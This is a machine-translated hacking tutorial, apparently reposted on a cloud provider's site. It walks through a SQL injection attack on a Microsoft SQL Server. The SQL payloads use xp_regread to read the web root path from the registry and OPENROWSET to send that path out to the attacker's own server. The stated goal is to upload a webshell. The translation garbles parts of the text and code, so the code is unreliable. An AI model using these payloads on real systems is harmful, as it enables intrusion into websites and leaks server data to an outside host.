Infiltration using OPENROWSET to engage the shell
Get the SQL injection point, the first thought is backup Webshell, throw in NB run a lap, found that blocked the SQL error messages, not the physical path, that also wrote a PP horse.
Associated with a command that is not very high OPENROWSET, a cross-Library server query, is to send an SQL command to the remote database, and then look at the results returned, but to start event tracking! We can write the website information to the database and then%$^%$@#$@^%$~
First build the SQL database on your own machine
Then create a table on the other machine (dbo). [Fenggou] ([Cha8][char] (255))--
Execute DECLARE @result varchar (255) EXEC master.dbo.xp_regread ' HKEY_LOCAL_MACHINE ' in each other, ' system\controlset001\services\ W3svc\parameters\virtual Roots ', '/', @result output insert into Fenggou (CHA8) VALUES (' Select A.* from OPENROWSET (' Sqlol EDB ', ' own IP '; Sa '; ' Your password ', ' select * from pubs.dbo.authors where au_fname= ' ' + @result + ' ' as a ');--
So Fenggou This table will have such a record select a.* from OPENROWSET (' SQLOLEDB ', ' own IP '; Sa '; ' Your password ', ' select * from pubs.dbo.authors where au_fname= ' d:\web,,1 ') as a
Needless to say, ' D:\WEB ' is the physical path read from the registration form. Then execute declare @a1 char (255) Set @a1 = (select Cha8 from Fenggou) exec (@a1);
Equal to the execution of the select a.* from OPENROWSET (' SQLOLEDB ', ' own IP '; Sa '; ' Your password ', ' select * from pubs.dbo.authors where au_fname= ' d:\web,,1 ') as a
OK, then you're on your machine. The select * from pubs.dbo.authors where au_fname= ' d:\web,,1 ' is displayed on the SQL Event Tracker
Wow hahaha physical path got to write pony Pass
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.